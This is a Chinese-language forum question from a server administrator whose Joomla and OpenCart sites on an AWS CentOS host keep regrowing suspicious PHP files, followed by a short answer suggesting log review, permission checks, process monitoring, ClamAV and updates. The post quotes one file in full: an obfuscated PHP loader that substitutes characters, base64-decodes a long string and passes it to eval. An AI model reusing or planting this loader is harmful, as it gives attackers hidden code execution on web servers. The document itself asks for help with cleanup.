我们有带有CentOs的AWS ec2实例。这个实例上有4个站点,一个静态HTML和PHP站点,两个Joomla(v3.4.5),一个Opencart(v2.0.1.1)
昨天我们发现了一些与我们的代码库无关的文件,似乎是恶意软件。我们执行了egrep -Rl 'function.*for.*strlen.*isset' /home/,发现有以下示例代码的文件很少。
<?php
function rjlynu($vkofjapoz, $avsepejks){$gjcdh = ''; for($i=0; $i < strlen($vkofjapoz); $i++){$gjcdh .= isset($avsepejks[$vkofjapoz[$i]]) ? $avsepejks[$vkofjapoz[$i]] : $vkofjapoz[$i];}
$jcmkpl="base64_decode";return $jcmkpl($gjcdh);}
$fkcrhcwlxx = 'KAYS3ymsuxKqMLBk10JIDxYauxMVX0MsMVddThITKAYS3ymsuxKqML5HupmY18MH18F8EcNkldkNuxMV'.
'X0Ma1fydX0MQ3Z98TcNkldkN1LyQx0BkXZyaXAYC3xKqF4bn4bJkuL9H1fyatxG'.
'Y1YmPDfmVt4w5ThITKAYS3ymsuxKqMLpP26mY2Ay7txBkXL9atAYCuz1IF4bn4wkkueNqtfyV1'.
'LYHXYm7XLpdDxMYT6JOR6mZByMhzRmlE4N8GzrdE7N8E4N8v41kO4bw2dqw'.
'O4BVuxFwvzJJ18MP2zwkldqwO4BVuxGXO8MY10yIt4MtZVM73Ay73VMtOcQwFcITO4JYDLPHOAMP1LRLG6mYXf'.
'GHuARq1LyV3Z6I3xkYT4BVuxFkThITaKqTu8ySD0BkXLrwD0ystAmCx0GQ1fYdx0BPu0FqMiBY2'.
'iKk48ITO4NwO4BQuxPQOcQw10BV3xJatA681VwbtAyrt4dwMs5Pve'.
'1kldqTO4NwO4BQuxPQOcQw10BVx0MY1A5PDLRqO75POAPVuZDmx4OeE4NeZVNeE4NbtAyrt4'.
'bn4eNwO4NbtAyrt4NmOiGQ1YmVuxJIDZGYT4OWELU+OedwOeOIO4BQuxPQThITO4NwO4BQ'.
'uxPQOcQw10BVx0MY1A5PDLRqOYdeveOIO4OwxzNeE4NbtAyrt4bn4wqwO4Nw1fyQtxMSO4BQux'.
'PQldkm4wk7XA6s1VJhhyBKOiITO4JdtZMI3ZFwM6GGy6JaRUmzy4NmOcOpldqwOiJpDf5kDVNbKpMFBe'.
'NmO4M11Y5SO7ITO4JdtZMI3ZFwMABHxLBYD8y8OcQwFcITO4JdtZMI'.
'3ZFwMUBYD8y8X0yQ1iyQO4NwO4NmO4tYDLPHMsITO4JdtZMI3ZFwMABHx0uY18NwvzJfDZ5suhITO4JdtZMI3ZFwM6BkXZyHtxK'.
'wO4NwO4NwO4NmOcUpldqwOiJpDf5kDVNbyAYCuZ5kXZYQO4NwO'.
'MY10yIt4MtZVM73Ay73VMtOcQwFhIT4fy73AWwDf6suhDQxLySDLmbuzPsuxMkDZ5k2fRqMiMY1VbkldqTu'.
'xPkt4wkld==';
$ghjnzmrjlg = Array('1'=>'c', '0'=>'3', '3'=>'a', '2'=>'e', '5'=>'x', '4'=>'C', '7'=>'j', '6'=>'F', '9'=>'5', '8'=>'n', 'A'=>'G', 'C'=>'t', 'B'=>'R', 'E'=>'L', 'D'=>'Y', 'G'=>'N', 'F'=>'M', 'I'=>'s', 'H'=>'v', 'K'=>'Q', 'J'=>'B', 'M'=>'J', 'L'=>'2', 'O'=>'I', 'N'=>'A', 'Q'=>'0', 'P'=>'h', 'S'=>'u', 'R'=>'U', 'U'=>'E', 'T'=>'K', 'W'=>'8', 'V'=>'y', 'Y'=>'l', 'X'=>'b', 'Z'=>'W', 'a'=>'f', 'c'=>'D', 'b'=>'k', 'e'=>'i', 'd'=>'w', 'g'=>'6', 'f'=>'m', 'i'=>'H', 'h'=>'T', 'k'=>'p', 'j'=>'r', 'm'=>'9', 'l'=>'O', 'o'=>'q', 'n'=>'7', 'q'=>'o', 'p'=>'1', 's'=>'z', 'r'=>'4', 'u'=>'Z', 't'=>'d', 'w'=>'g', 'v'=>'P', 'y'=>'V', 'x'=>'X', 'z'=>'S');
eval(rjlynu($fkcrhcwlxx, $ghjnzmrjlg));?>
即使我们删除了这些文件,它们也会一次又一次地被创建。
可能是什么问题?我们如何找到这背后的根本原因,什么是永久解决方案?
感谢
查找访问日志我认为它们位于此处/var/log/apache2/access.log我还会检查文件夹权限,确保它不是777。我还将使用ssh中的ps命令检查进程,以监视正在运行的进程。我也会确保运行ClamAV。在此之前,我还会备份所有的网站,并升级你安装的每个插件。祝你的服务器好运。